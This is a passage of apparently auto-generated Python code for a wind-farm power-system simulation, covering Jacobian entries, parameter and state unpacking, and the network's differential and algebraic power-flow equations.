struct[0].Gy_ini[12,11] = V_W2mv*V_W3mv*(b_W2mv_W3mv*cos(theta_W2mv - theta_W3mv) + g_W2mv_W3mv*sin(theta_W2mv - theta_W3mv))
struct[0].Gy_ini[12,12] = V_POImv*(b_W3mv_POImv*sin(theta_POImv - theta_W3mv) - g_W3mv_POImv*cos(theta_POImv - theta_W3mv)) + V_W2mv*(b_W2mv_W3mv*sin(theta_W2mv - theta_W3mv) - g_W2mv_W3mv*cos(theta_W2mv - theta_W3mv)) + V_W3lv*(b_W3mv_W3lv*sin(theta_W3lv - theta_W3mv) - g_W3mv_W3lv*cos(theta_W3lv - theta_W3mv)) + 2*V_W3mv*(g_W2mv_W3mv + g_W3mv_POImv + g_W3mv_W3lv)
struct[0].Gy_ini[12,13] = V_POImv*V_W3mv*(-b_W3mv_POImv*cos(theta_POImv - theta_W3mv) - g_W3mv_POImv*sin(theta_POImv - theta_W3mv)) + V_W2mv*V_W3mv*(-b_W2mv_W3mv*cos(theta_W2mv - theta_W3mv) - g_W2mv_W3mv*sin(theta_W2mv - theta_W3mv)) + V_W3lv*V_W3mv*(-b_W3mv_W3lv*cos(theta_W3lv - theta_W3mv) - g_W3mv_W3lv*sin(theta_W3lv - theta_W3mv))
struct[0].Gy_ini[12,14] = V_W3mv*(b_W3mv_POImv*sin(theta_POImv - theta_W3mv) - g_W3mv_POImv*cos(theta_POImv - theta_W3mv))
struct[0].Gy_ini[12,15] = V_POImv*V_W3mv*(b_W3mv_POImv*cos(theta_POImv - theta_W3mv) + g_W3mv_POImv*sin(theta_POImv - theta_W3mv))
struct[0].Gy_ini[13,4] = V_W3mv*(b_W3mv_W3lv*cos(theta_W3lv - theta_W3mv) + g_W3mv_W3lv*sin(theta_W3lv - theta_W3mv))
struct[0].Gy_ini[13,5] = V_W3lv*V_W3mv*(-b_W3mv_W3lv*sin(theta_W3lv - theta_W3mv) + g_W3mv_W3lv*cos(theta_W3lv - theta_W3mv))
struct[0].Gy_ini[13,10] = V_W3mv*(b_W2mv_W3mv*cos(theta_W2mv - theta_W3mv) + g_W2mv_W3mv*sin(theta_W2mv - theta_W3mv))
struct[0].Gy_ini[13,11] = V_W2mv*V_W3mv*(-b_W2mv_W3mv*sin(theta_W2mv - theta_W3mv) + g_W2mv_W3mv*cos(theta_W2mv - theta_W3mv))
struct[0].Gy_ini[13,12] = V_POImv*(b_W3mv_POImv*cos(theta_POImv - theta_W3mv) + g_W3mv_POImv*sin(theta_POImv - theta_W3mv)) + V_W2mv*(b_W2mv_W3mv*cos(theta_W2mv - theta_W3mv) + g_W2mv_W3mv*sin(theta_W2mv - theta_W3mv)) + V_W3lv*(b_W3mv_W3lv*cos(theta_W3lv - theta_W3mv) + g_W3mv_W3lv*sin(theta_W3lv - theta_W3mv)) + 2*V_W3mv*(-b_W2mv_W3mv - b_W3mv_POImv - b_W3mv_W3lv - bs_W2mv_W3mv/2 - bs_W3mv_POImv/2 - bs_W3mv_W3lv/2)
struct[0].Gy_ini[13,13] = V_POImv*V_W3mv*(b_W3mv_POImv*sin(theta_POImv - theta_W3mv) - g_W3mv_POImv*cos(theta_POImv - theta_W3mv)) + V_W2mv*V_W3mv*(b_W2mv_W3mv*sin(theta_W2mv - theta_W3mv) - g_W2mv_W3mv*cos(theta_W2mv - theta_W3mv)) + V_W3lv*V_W3mv*(b_W3mv_W3lv*sin(theta_W3lv - theta_W3mv) - g_W3mv_W3lv*cos(theta_W3lv - theta_W3mv))
struct[0].Gy_ini[13,14] = V_W3mv*(b_W3mv_POImv*cos(theta_POImv - theta_W3mv) + g_W3mv_POImv*sin(theta_POImv - theta_W3mv))
struct[0].Gy_ini[13,15] = V_POImv*V_W3mv*(-b_W3mv_POImv*sin(theta_POImv - theta_W3mv) + g_W3mv_POImv*cos(theta_POImv - theta_W3mv))
struct[0].Gy_ini[14,12] = V_POImv*(-b_W3mv_POImv*sin(theta_POImv - theta_W3mv) - g_W3mv_POImv*cos(theta_POImv - theta_W3mv))
struct[0].Gy_ini[14,13] = V_POImv*V_W3mv*(b_W3mv_POImv*cos(theta_POImv - theta_W3mv) - g_W3mv_POImv*sin(theta_POImv - theta_W3mv))
struct[0].Gy_ini[14,14] = V_POI*(b_POI_POImv*sin(theta_POI - theta_POImv) - g_POI_POImv*cos(theta_POI - theta_POImv)) + 2*V_POImv*(g_POI_POImv + g_STmv_POImv + g_W3mv_POImv) + V_STmv*(-b_STmv_POImv*sin(theta_POImv - theta_STmv) - g_STmv_POImv*cos(theta_POImv - theta_STmv)) + V_W3mv*(-b_W3mv_POImv*sin(theta_POImv - theta_W3mv) - g_W3mv_POImv*cos(theta_POImv - theta_W3mv))
struct[0].Gy_ini[14,15] = V_POI*V_POImv*(-b_POI_POImv*cos(theta_POI - theta_POImv) - g_POI_POImv*sin(theta_POI - theta_POImv)) + V_POImv*V_STmv*(-b_STmv_POImv*cos(theta_POImv - theta_STmv) + g_STmv_POImv*sin(theta_POImv - theta_STmv)) + V_POImv*V_W3mv*(-b_W3mv_POImv*cos(theta_POImv - theta_W3mv) + g_W3mv_POImv*sin(theta_POImv - theta_W3mv))
struct[0].Gy_ini[14,16] = V_POImv*(-b_STmv_POImv*sin(theta_POImv - theta_STmv) - g_STmv_POImv*cos(theta_POImv - theta_STmv))
struct[0].Gy_ini[14,17] = V_POImv*V_STmv*(b_STmv_POImv*cos(theta_POImv - theta_STmv) - g_STmv_POImv*sin(theta_POImv - theta_STmv))
struct[0].Gy_ini[14,18] = V_POImv*(b_POI_POImv*sin(theta_POI - theta_POImv) - g_POI_POImv*cos(theta_POI - theta_POImv))
struct[0].Gy_ini[14,19] = V_POI*V_POImv*(b_POI_POImv*cos(theta_POI - theta_POImv) + g_POI_POImv*sin(theta_POI - theta_POImv))
struct[0].Gy_ini[15,12] = V_POImv*(b_W3mv_POImv*cos(theta_POImv - theta_W3mv) - g_W3mv_POImv*sin(theta_POImv - theta_W3mv))
struct[0].Gy_ini[15,13] = V_POImv*V_W3mv*(b_W3mv_POImv*sin(theta_POImv - theta_W3mv) + g_W3mv_POImv*cos(theta_POImv - theta_W3mv))
struct[0].Gy_ini[15,14] = V_POI*(b_POI_POImv*cos(theta_POI - theta_POImv) + g_POI_POImv*sin(theta_POI - theta_POImv)) + 2*V_POImv*(-b_POI_POImv - b_STmv_POImv - b_W3mv_POImv - bs_POI_POImv/2 - bs_STmv_POImv/2 - bs_W3mv_POImv/2) + V_STmv*(b_STmv_POImv*cos(theta_POImv - theta_STmv) - g_STmv_POImv*sin(theta_POImv - theta_STmv)) + V_W3mv*(b_W3mv_POImv*cos(theta_POImv - theta_W3mv) - g_W3mv_POImv*sin(theta_POImv - theta_W3mv))
struct[0].Gy_ini[15,15] = V_POI*V_POImv*(b_POI_POImv*sin(theta_POI - theta_POImv) - g_POI_POImv*cos(theta_POI - theta_POImv)) + V_POImv*V_STmv*(-b_STmv_POImv*sin(theta_POImv - theta_STmv) - g_STmv_POImv*cos(theta_POImv - theta_STmv)) + V_POImv*V_W3mv*(-b_W3mv_POImv*sin(theta_POImv - theta_W3mv) - g_W3mv_POImv*cos(theta_POImv - theta_W3mv))
struct[0].Gy_ini[15,16] = V_POImv*(b_STmv_POImv*cos(theta_POImv - theta_STmv) - g_STmv_POImv*sin(theta_POImv - theta_STmv))
struct[0].Gy_ini[15,17] = V_POImv*V_STmv*(b_STmv_POImv*sin(theta_POImv - theta_STmv) + g_STmv_POImv*cos(theta_POImv - theta_STmv))
struct[0].Gy_ini[15,18] = V_POImv*(b_POI_POImv*cos(theta_POI - theta_POImv) + g_POI_POImv*sin(theta_POI - theta_POImv))
struct[0].Gy_ini[15,19] = V_POI*V_POImv*(-b_POI_POImv*sin(theta_POI - theta_POImv) + g_POI_POImv*cos(theta_POI - theta_POImv))
struct[0].Gy_ini[16,6] = V_STmv*(b_STmv_STlv*sin(theta_STlv - theta_STmv) - g_STmv_STlv*cos(theta_STlv - theta_STmv))
struct[0].Gy_ini[16,7] = V_STlv*V_STmv*(b_STmv_STlv*cos(theta_STlv - theta_STmv) + g_STmv_STlv*sin(theta_STlv - theta_STmv))
struct[0].Gy_ini[16,14] = V_STmv*(b_STmv_POImv*sin(theta_POImv - theta_STmv) - g_STmv_POImv*cos(theta_POImv - theta_STmv))
struct[0].Gy_ini[16,15] = V_POImv*V_STmv*(b_STmv_POImv*cos(theta_POImv - theta_STmv) + g_STmv_POImv*sin(theta_POImv - theta_STmv))
struct[0].Gy_ini[16,16] = V_POImv*(b_STmv_POImv*sin(theta_POImv - theta_STmv) - g_STmv_POImv*cos(theta_POImv - theta_STmv)) + V_STlv*(b_STmv_STlv*sin(theta_STlv - theta_STmv) - g_STmv_STlv*cos(theta_STlv - theta_STmv)) + 2*V_STmv*(g_STmv_POImv + g_STmv_STlv)
struct[0].Gy_ini[16,17] = V_POImv*V_STmv*(-b_STmv_POImv*cos(theta_POImv - theta_STmv) - g_STmv_POImv*sin(theta_POImv - theta_STmv)) + V_STlv*V_STmv*(-b_STmv_STlv*cos(theta_STlv - theta_STmv) - g_STmv_STlv*sin(theta_STlv - theta_STmv))
struct[0].Gy_ini[17,6] = V_STmv*(b_STmv_STlv*cos(theta_STlv - theta_STmv) + g_STmv_STlv*sin(theta_STlv - theta_STmv))
struct[0].Gy_ini[17,7] = V_STlv*V_STmv*(-b_STmv_STlv*sin(theta_STlv - theta_STmv) + g_STmv_STlv*cos(theta_STlv - theta_STmv))
struct[0].Gy_ini[17,14] = V_STmv*(b_STmv_POImv*cos(theta_POImv - theta_STmv) + g_STmv_POImv*sin(theta_POImv - theta_STmv))
struct[0].Gy_ini[17,15] = V_POImv*V_STmv*(-b_STmv_POImv*sin(theta_POImv - theta_STmv) + g_STmv_POImv*cos(theta_POImv - theta_STmv))
struct[0].Gy_ini[17,16] = V_POImv*(b_STmv_POImv*cos(theta_POImv - theta_STmv) + g_STmv_POImv*sin(theta_POImv - theta_STmv)) + V_STlv*(b_STmv_STlv*cos(theta_STlv - theta_STmv) + g_STmv_STlv*sin(theta_STlv - theta_STmv)) + 2*V_STmv*(-b_STmv_POImv - b_STmv_STlv - bs_STmv_POImv/2 - bs_STmv_STlv/2)
struct[0].Gy_ini[17,17] = V_POImv*V_STmv*(b_STmv_POImv*sin(theta_POImv - theta_STmv) - g_STmv_POImv*cos(theta_POImv - theta_STmv)) + V_STlv*V_STmv*(b_STmv_STlv*sin(theta_STlv - theta_STmv) - g_STmv_STlv*cos(theta_STlv - theta_STmv))
struct[0].Gy_ini[18,14] = V_POI*(-b_POI_POImv*sin(theta_POI - theta_POImv) - g_POI_POImv*cos(theta_POI - theta_POImv))
struct[0].Gy_ini[18,15] = V_POI*V_POImv*(b_POI_POImv*cos(theta_POI - theta_POImv) - g_POI_POImv*sin(theta_POI - theta_POImv))
struct[0].Gy_ini[18,18] = V_GRID*(b_POI_GRID*sin(theta_GRID - theta_POI) - g_POI_GRID*cos(theta_GRID - theta_POI)) + 2*V_POI*(g_POI_GRID + g_POI_POImv) + V_POImv*(-b_POI_POImv*sin(theta_POI - theta_POImv) - g_POI_POImv*cos(theta_POI - theta_POImv))
struct[0].Gy_ini[18,19] = V_GRID*V_POI*(-b_POI_GRID*cos(theta_GRID - theta_POI) - g_POI_GRID*sin(theta_GRID - theta_POI)) + V_POI*V_POImv*(-b_POI_POImv*cos(theta_POI - theta_POImv) + g_POI_POImv*sin(theta_POI - theta_POImv))
struct[0].Gy_ini[18,20] = V_POI*(b_POI_GRID*sin(theta_GRID - theta_POI) - g_POI_GRID*cos(theta_GRID - theta_POI))
struct[0].Gy_ini[18,21] = V_GRID*V_POI*(b_POI_GRID*cos(theta_GRID - theta_POI) + g_POI_GRID*sin(theta_GRID - theta_POI))
struct[0].Gy_ini[19,14] = V_POI*(b_POI_POImv*cos(theta_POI - theta_POImv) - g_POI_POImv*sin(theta_POI - theta_POImv))
struct[0].Gy_ini[19,15] = V_POI*V_POImv*(b_POI_POImv*sin(theta_POI - theta_POImv) + g_POI_POImv*cos(theta_POI - theta_POImv))
struct[0].Gy_ini[19,18] = V_GRID*(b_POI_GRID*cos(theta_GRID - theta_POI) + g_POI_GRID*sin(theta_GRID - theta_POI)) + 2*V_POI*(-b_POI_GRID - b_POI_POImv - bs_POI_GRID/2 - bs_POI_POImv/2) + V_POImv*(b_POI_POImv*cos(theta_POI - theta_POImv) - g_POI_POImv*sin(theta_POI - theta_POImv))
struct[0].Gy_ini[19,19] = V_GRID*V_POI*(b_POI_GRID*sin(theta_GRID - theta_POI) - g_POI_GRID*cos(theta_GRID - theta_POI)) + V_POI*V_POImv*(-b_POI_POImv*sin(theta_POI - theta_POImv) - g_POI_POImv*cos(theta_POI - theta_POImv))
struct[0].Gy_ini[19,20] = V_POI*(b_POI_GRID*cos(theta_GRID - theta_POI) + g_POI_GRID*sin(theta_GRID - theta_POI))
struct[0].Gy_ini[19,21] = V_GRID*V_POI*(-b_POI_GRID*sin(theta_GRID - theta_POI) + g_POI_GRID*cos(theta_GRID - theta_POI))
struct[0].Gy_ini[20,18] = V_GRID*(-b_POI_GRID*sin(theta_GRID - theta_POI) - g_POI_GRID*cos(theta_GRID - theta_POI))
struct[0].Gy_ini[20,19] = V_GRID*V_POI*(b_POI_GRID*cos(theta_GRID - theta_POI) - g_POI_GRID*sin(theta_GRID - theta_POI))
struct[0].Gy_ini[20,20] = 2*V_GRID*g_POI_GRID + V_POI*(-b_POI_GRID*sin(theta_GRID - theta_POI) - g_POI_GRID*cos(theta_GRID - theta_POI))
struct[0].Gy_ini[20,21] = V_GRID*V_POI*(-b_POI_GRID*cos(theta_GRID - theta_POI) + g_POI_GRID*sin(theta_GRID - theta_POI))
struct[0].Gy_ini[20,25] = -S_n_GRID/S_base
struct[0].Gy_ini[21,18] = V_GRID*(b_POI_GRID*cos(theta_GRID - theta_POI) - g_POI_GRID*sin(theta_GRID - theta_POI))
struct[0].Gy_ini[21,19] = V_GRID*V_POI*(b_POI_GRID*sin(theta_GRID - theta_POI) + g_POI_GRID*cos(theta_GRID - theta_POI))
struct[0].Gy_ini[21,20] = 2*V_GRID*(-b_POI_GRID - bs_POI_GRID/2) + V_POI*(b_POI_GRID*cos(theta_GRID - theta_POI) - g_POI_GRID*sin(theta_GRID - theta_POI))
struct[0].Gy_ini[21,21] = V_GRID*V_POI*(-b_POI_GRID*sin(theta_GRID - theta_POI) - g_POI_GRID*cos(theta_GRID - theta_POI))
struct[0].Gy_ini[21,26] = -S_n_GRID/S_base
struct[0].Gy_ini[22,20] = K_p_GRID*(-i_d_GRID*sin(delta_GRID - theta_GRID) - i_q_GRID*cos(delta_GRID - theta_GRID))
struct[0].Gy_ini[22,21] = K_p_GRID*(V_GRID*i_d_GRID*cos(delta_GRID - theta_GRID) - V_GRID*i_q_GRID*sin(delta_GRID - theta_GRID))
struct[0].Gy_ini[22,22] = -1
struct[0].Gy_ini[22,23] = K_p_GRID*(-2*R_v_GRID*i_d_GRID - V_GRID*sin(delta_GRID - theta_GRID))
struct[0].Gy_ini[22,24] = K_p_GRID*(-2*R_v_GRID*i_q_GRID - V_GRID*cos(delta_GRID - theta_GRID))
struct[0].Gy_ini[22,27] = K_p_GRID
struct[0].Gy_ini[23,20] = -sin(delta_GRID - theta_GRID)
struct[0].Gy_ini[23,21] = V_GRID*cos(delta_GRID - theta_GRID)
struct[0].Gy_ini[23,23] = -R_v_GRID
struct[0].Gy_ini[23,24] = X_v_GRID
struct[0].Gy_ini[24,20] = -cos(delta_GRID - theta_GRID)
struct[0].Gy_ini[24,21] = -V_GRID*sin(delta_GRID - theta_GRID)
struct[0].Gy_ini[24,23] = -X_v_GRID
struct[0].Gy_ini[24,24] = -R_v_GRID
struct[0].Gy_ini[25,20] = i_d_GRID*sin(delta_GRID - theta_GRID) + i_q_GRID*cos(delta_GRID - theta_GRID)
struct[0].Gy_ini[25,21] = -V_GRID*i_d_GRID*cos(delta_GRID - theta_GRID) + V_GRID*i_q_GRID*sin(delta_GRID - theta_GRID)
struct[0].Gy_ini[25,23] = V_GRID*sin(delta_GRID - theta_GRID)
struct[0].Gy_ini[25,24] = V_GRID*cos(delta_GRID - theta_GRID)
struct[0].Gy_ini[25,25] = -1
struct[0].Gy_ini[26,20] = i_d_GRID*cos(delta_GRID - theta_GRID) - i_q_GRID*sin(delta_GRID - theta_GRID)
struct[0].Gy_ini[26,21] = V_GRID*i_d_GRID*sin(delta_GRID - theta_GRID) + V_GRID*i_q_GRID*cos(delta_GRID - theta_GRID)
struct[0].Gy_ini[26,23] = V_GRID*cos(delta_GRID - theta_GRID)
struct[0].Gy_ini[26,24] = -V_GRID*sin(delta_GRID - theta_GRID)
struct[0].Gy_ini[26,26] = -1
struct[0].Gy_ini[27,22] = -1/Droop_GRID
struct[0].Gy_ini[27,27] = -1
struct[0].Gy_ini[27,29] = K_sec_GRID
struct[0].Gy_ini[28,22] = 1
struct[0].Gy_ini[28,28] = -1
struct[0].Gy_ini[29,28] = -K_p_agc
struct[0].Gy_ini[29,29] = -1
def run_nn(t,struct,mode):
# Parameters:
S_base = struct[0].S_base
g_W1mv_W2mv = struct[0].g_W1mv_W2mv
b_W1mv_W2mv = struct[0].b_W1mv_W2mv
bs_W1mv_W2mv = struct[0].bs_W1mv_W2mv
g_W2mv_W3mv = struct[0].g_W2mv_W3mv
b_W2mv_W3mv = struct[0].b_W2mv_W3mv
bs_W2mv_W3mv = struct[0].bs_W2mv_W3mv
g_W3mv_POImv = struct[0].g_W3mv_POImv
b_W3mv_POImv = struct[0].b_W3mv_POImv
bs_W3mv_POImv = struct[0].bs_W3mv_POImv
g_STmv_POImv = struct[0].g_STmv_POImv
b_STmv_POImv = struct[0].b_STmv_POImv
bs_STmv_POImv = struct[0].bs_STmv_POImv
g_POI_GRID = struct[0].g_POI_GRID
b_POI_GRID = struct[0].b_POI_GRID
bs_POI_GRID = struct[0].bs_POI_GRID
g_POI_POImv = struct[0].g_POI_POImv
b_POI_POImv = struct[0].b_POI_POImv
bs_POI_POImv = struct[0].bs_POI_POImv
g_W1mv_W1lv = struct[0].g_W1mv_W1lv
b_W1mv_W1lv = struct[0].b_W1mv_W1lv
bs_W1mv_W1lv = struct[0].bs_W1mv_W1lv
g_W2mv_W2lv = struct[0].g_W2mv_W2lv
b_W2mv_W2lv = struct[0].b_W2mv_W2lv
bs_W2mv_W2lv = struct[0].bs_W2mv_W2lv
g_W3mv_W3lv = struct[0].g_W3mv_W3lv
b_W3mv_W3lv = struct[0].b_W3mv_W3lv
bs_W3mv_W3lv = struct[0].bs_W3mv_W3lv
g_STmv_STlv = struct[0].g_STmv_STlv
b_STmv_STlv = struct[0].b_STmv_STlv
bs_STmv_STlv = struct[0].bs_STmv_STlv
U_W1lv_n = struct[0].U_W1lv_n
U_W2lv_n = struct[0].U_W2lv_n
U_W3lv_n = struct[0].U_W3lv_n
U_STlv_n = struct[0].U_STlv_n
U_W1mv_n = struct[0].U_W1mv_n
U_W2mv_n = struct[0].U_W2mv_n
U_W3mv_n = struct[0].U_W3mv_n
U_POImv_n = struct[0].U_POImv_n
U_STmv_n = struct[0].U_STmv_n
U_POI_n = struct[0].U_POI_n
U_GRID_n = struct[0].U_GRID_n
S_n_GRID = struct[0].S_n_GRID
Omega_b_GRID = struct[0].Omega_b_GRID
K_p_GRID = struct[0].K_p_GRID
T_p_GRID = struct[0].T_p_GRID
K_q_GRID = struct[0].K_q_GRID
T_v_GRID = struct[0].T_v_GRID
X_v_GRID = struct[0].X_v_GRID
R_v_GRID = struct[0].R_v_GRID
K_delta_GRID = struct[0].K_delta_GRID
K_sec_GRID = struct[0].K_sec_GRID
Droop_GRID = struct[0].Droop_GRID
K_p_agc = struct[0].K_p_agc
K_i_agc = struct[0].K_i_agc
# Inputs:
P_W1lv = struct[0].P_W1lv
Q_W1lv = struct[0].Q_W1lv
P_W2lv = struct[0].P_W2lv
Q_W2lv = struct[0].Q_W2lv
P_W3lv = struct[0].P_W3lv
Q_W3lv = struct[0].Q_W3lv
P_STlv = struct[0].P_STlv
Q_STlv = struct[0].Q_STlv
P_W1mv = struct[0].P_W1mv
Q_W1mv = struct[0].Q_W1mv
P_W2mv = struct[0].P_W2mv
Q_W2mv = struct[0].Q_W2mv
P_W3mv = struct[0].P_W3mv
Q_W3mv = struct[0].Q_W3mv
P_POImv = struct[0].P_POImv
Q_POImv = struct[0].Q_POImv
P_STmv = struct[0].P_STmv
Q_STmv = struct[0].Q_STmv
P_POI = struct[0].P_POI
Q_POI = struct[0].Q_POI
P_GRID = struct[0].P_GRID
Q_GRID = struct[0].Q_GRID
v_ref_GRID = struct[0].v_ref_GRID
p_m_GRID = struct[0].p_m_GRID
p_c_GRID = struct[0].p_c_GRID
omega_ref_GRID = struct[0].omega_ref_GRID
q_ref_GRID = struct[0].q_ref_GRID
# Dynamical states:
delta_GRID = struct[0].x[0,0]
xi_p_GRID = struct[0].x[1,0]
e_qv_GRID = struct[0].x[2,0]
xi_freq = struct[0].x[3,0]
# Algebraic states:
V_W1lv = struct[0].y_run[0,0]
theta_W1lv = struct[0].y_run[1,0]
V_W2lv = struct[0].y_run[2,0]
theta_W2lv = struct[0].y_run[3,0]
V_W3lv = struct[0].y_run[4,0]
theta_W3lv = struct[0].y_run[5,0]
V_STlv = struct[0].y_run[6,0]
theta_STlv = struct[0].y_run[7,0]
V_W1mv = struct[0].y_run[8,0]
theta_W1mv = struct[0].y_run[9,0]
V_W2mv = struct[0].y_run[10,0]
theta_W2mv = struct[0].y_run[11,0]
V_W3mv = struct[0].y_run[12,0]
theta_W3mv = struct[0].y_run[13,0]
V_POImv = struct[0].y_run[14,0]
theta_POImv = struct[0].y_run[15,0]
V_STmv = struct[0].y_run[16,0]
theta_STmv = struct[0].y_run[17,0]
V_POI = struct[0].y_run[18,0]
theta_POI = struct[0].y_run[19,0]
V_GRID = struct[0].y_run[20,0]
theta_GRID = struct[0].y_run[21,0]
omega_GRID = struct[0].y_run[22,0]
i_d_GRID = struct[0].y_run[23,0]
i_q_GRID = struct[0].y_run[24,0]
p_g_GRID = struct[0].y_run[25,0]
q_g_GRID = struct[0].y_run[26,0]
p_m_GRID = struct[0].y_run[27,0]
omega_coi = struct[0].y_run[28,0]
p_agc = struct[0].y_run[29,0]
# Differential equations:
if mode == 2:
struct[0].f[0,0] = -K_delta_GRID*delta_GRID + Omega_b_GRID*(omega_GRID - omega_coi)
struct[0].f[1,0] = -i_d_GRID*(R_v_GRID*i_d_GRID + V_GRID*sin(delta_GRID - theta_GRID)) - i_q_GRID*(R_v_GRID*i_q_GRID + V_GRID*cos(delta_GRID - theta_GRID)) + p_m_GRID
struct[0].f[2,0] = (K_q_GRID*(-q_g_GRID + q_ref_GRID) - e_qv_GRID + v_ref_GRID)/T_v_GRID
struct[0].f[3,0] = 1 - omega_coi
# Algebraic equations:
if mode == 3:
struct[0].g[0,0] = -P_W1lv/S_base + V_W1lv**2*g_W1mv_W1lv + V_W1lv*V_W1mv*(-b_W1mv_W1lv*sin(theta_W1lv - theta_W1mv) - g_W1mv_W1lv*cos(theta_W1lv - theta_W1mv))
struct[0].g[1,0] = -Q_W1lv/S_base + V_W1lv**2*(-b_W1mv_W1lv - bs_W1mv_W1lv/2) + V_W1lv*V_W1mv*(b_W1mv_W1lv*cos(theta_W1lv - theta_W1mv) - g_W1mv_W1lv*sin(theta_W1lv - theta_W1mv))
struct[0].g[2,0] = -P_W2lv/S_base + V_W2lv**2*g_W2mv_W2lv + V_W2lv*V_W2mv*(-b_W2mv_W2lv*sin(theta_W2lv - theta_W2mv) - g_W2mv_W2lv*cos(theta_W2lv - theta_W2mv))
struct[0].g[3,0] = -Q_W2lv/S_base + V_W2lv**2*(-b_W2mv_W2lv - bs_W2mv_W2lv/2) + V_W2lv*V_W2mv*(b_W2mv_W2lv*cos(theta_W2lv - theta_W2mv) - g_W2mv_W2lv*sin(theta_W2lv - theta_W2mv))
struct[0].g[4,0] = -P_W3lv/S_base + V_W3lv**2*g_W3mv_W3lv + V_W3lv*V_W3mv*(-b_W3mv_W3lv*sin(theta_W3lv - theta_W3mv) - g_W3mv_W3lv*cos(theta_W3lv - theta_W3mv))
struct[0].g[5,0] = -Q_W3lv/S_base + V_W3lv**2*(-b_W3mv_W3lv - bs_W3mv_W3lv/2) + V_W3lv*V_W3mv*(b_W3mv_W3lv*cos(theta_W3lv - theta_W3mv) - g_W3mv_W3lv*sin(theta_W3lv - theta_W3mv))
struct[0].g[6,0] = -P_STlv/S_base + V_STlv**2*g_STmv_STlv + V_STlv*V_STmv*(-b_STmv_STlv*sin(theta_STlv - theta_STmv) - g_STmv_STlv*cos(theta_STlv - theta_STmv))
struct[0].g[7,0] = -Q_STlv/S_base + V_STlv**2*(-b_STmv_STlv - bs_STmv_STlv/2) + V_STlv*V_STmv*(b_STmv_STlv*cos(theta_STlv - theta_STmv) - g_STmv_STlv*sin(theta_STlv - theta_STmv))
struct[0].g[8,0] = -P_W1mv/S_base + V_W1lv*V_W1mv*(b_W1mv_W1lv*sin(theta_W1lv - theta_W1mv) - g_W1mv_W1lv*cos(theta_W1lv - theta_W1mv)) + V_W1mv**2*(g_W1mv_W1lv + g_W1mv_W2mv) + V_W1mv*V_W2mv*(-b_W1mv_W2mv*sin(theta_W1mv - theta_W2mv) - g_W1mv_W2mv*cos(theta_W1mv - theta_W2mv))
struct[0].g[9,0] = -Q_W1mv/S_base + V_W1lv*V_W1mv*(b_W1mv_W1lv*cos(theta_W1lv - theta_W1mv) + g_W1mv_W1lv*sin(theta_W1lv - theta_W1mv)) + V_W1mv**2*(-b_W1mv_W1lv - b_W1mv_W2mv - bs_W1mv_W1lv/2 - bs_W1mv_W2mv/2) + V_W1mv*V_W2mv*(b_W1mv_W2mv*cos(theta_W1mv - theta_W2mv) - g_W1mv_W2mv*sin(theta_W1mv - theta_W2mv))
struct[0].g[10,0] = -P_W2mv/S_base + V_W1mv*V_W2mv*(b_W1mv_W2mv*sin(theta_W1mv - theta_W2mv) - g_W1mv_W2mv*cos(theta_W1mv - theta_W2mv)) + V_W2lv*V_W2mv*(b_W2mv_W2lv*sin(theta_W2lv - theta_W2mv) - g_W2mv_W2lv*cos(theta_W2lv - theta_W2mv)) + V_W2mv**2*(g_W1mv_W2mv + g_W2mv_W2lv + g_W2mv_W3mv) + V_W2mv*V_W3mv*(-b_W2mv_W3mv*sin(theta_W2mv - theta_W3mv) - g_W2mv_W3mv*cos(theta_W2mv - theta_W3mv))
struct[0].g[11,0] = -Q_W2mv/S_base + V_W1mv*V_W2mv*(b_W1mv_W2mv*cos(theta_W1mv - theta_W2mv) + g_W1mv_W2mv*sin(theta_W1mv - theta_W2mv)) + V_W2lv*V_W2mv*(b_W2mv_W2lv*cos(theta_W2lv - theta_W2mv) + g_W2mv_W2lv*sin(theta_W2lv - theta_W2mv)) + V_W2mv**2*(-b_W1mv_W2mv - b_W2mv_W2lv - b_W2mv_W3mv - bs_W1mv_W2mv/2 - bs_W2mv_W2lv/2 - bs_W2mv_W3mv/2) + V_W2mv*V_W3mv*(b_W2mv_W3mv*cos(theta_W2mv - theta_W3mv) - g_W2mv_W3mv*sin(theta_W2mv - theta_W3mv))
struct[0].g[12,0] = -P_W3mv/S_base + V_POImv*V_W3mv*(b_W3mv_POImv*sin(theta_POImv - theta_W3mv) - g_W3mv_POImv*cos(theta_POImv - theta_W3mv)) + V_W2mv*V_W3mv*(b_W2mv_W3mv*sin(theta_W2mv - theta_W3mv) - g_W2mv_W3mv*cos(theta_W2mv - theta_W3mv)) + V_W3lv*V_W3mv*(b_W3mv_W3lv*sin(theta_W3lv - theta_W3mv) - g_W3mv_W3lv*cos(theta_W3lv - theta_W3mv)) + V_W3mv**2*(g_W2mv_W3mv + g_W3mv_POImv + g_W3mv_W3lv)
struct[0].g[13,0] = -Q_W3mv/S_base + V_POImv*V_W3mv*(b_W3mv_POImv*cos(theta_POImv - theta_W3mv) + g_W3mv_POImv*sin(theta_POImv - theta_W3mv)) + V_W2mv*V_W3mv*(b_W2mv_W3mv*cos(theta_W2mv - theta_W3mv) + g_W2mv_W3mv*sin(theta_W2mv - theta_W3mv)) + V_W3lv*V_W3mv*(b_W3mv_W3lv*cos(theta_W3lv - theta_W3mv) + g_W3mv_W3lv*sin(theta_W3lv - theta_W3mv)) + V_W3mv**2*(-b_W2mv_W3mv - b_W3mv_POImv - b_W3mv_W3lv - bs_W2mv_W3mv/2 - bs_W3mv_POImv/2 - bs_W3mv_W3lv/2)
struct[0].g[14,0] = -P_POImv/S_base + V_POI*V_POImv*(b_POI_POImv*sin(theta_POI - theta_POImv) - g_POI_POImv*cos(theta_POI - theta_POImv)) + V_POImv**2*(g_POI_POImv + g_STmv_POImv + g_W3mv_POImv) + V_POImv*V_STmv*(-b_STmv_POImv*sin(theta_POImv - theta_STmv) - g_STmv_POImv*cos(theta_POImv - theta_STmv)) + V_POImv*V_W3mv*(-b_W3mv_POImv*sin(theta_POImv - theta_W3mv) - g_W3mv_POImv*cos(theta_POImv - theta_W3mv))
struct[0].g[15,0] = -Q_POImv/S_base + V_POI*V_POImv*(b_POI_POImv*cos(theta_POI - theta_POImv) + g_POI_POImv*sin(theta_POI - theta_POImv)) + V_POImv**2*(-b_POI_POImv - b_STmv_POImv - b_W3mv_POImv - bs_POI_POImv/2 - bs_STmv_POImv/2 - bs_W3mv_POImv/2) + V_POImv*V_STmv*(b_STmv_POImv*cos(theta_POImv - theta_STmv) - g_STmv_POImv*sin(theta_POImv - theta_STmv)) + V_POImv*V_W3mv*(b_W3mv_POImv*cos(theta_POImv - theta_W3mv) - g_W3mv_POImv*sin(theta_POImv - theta_W3mv))
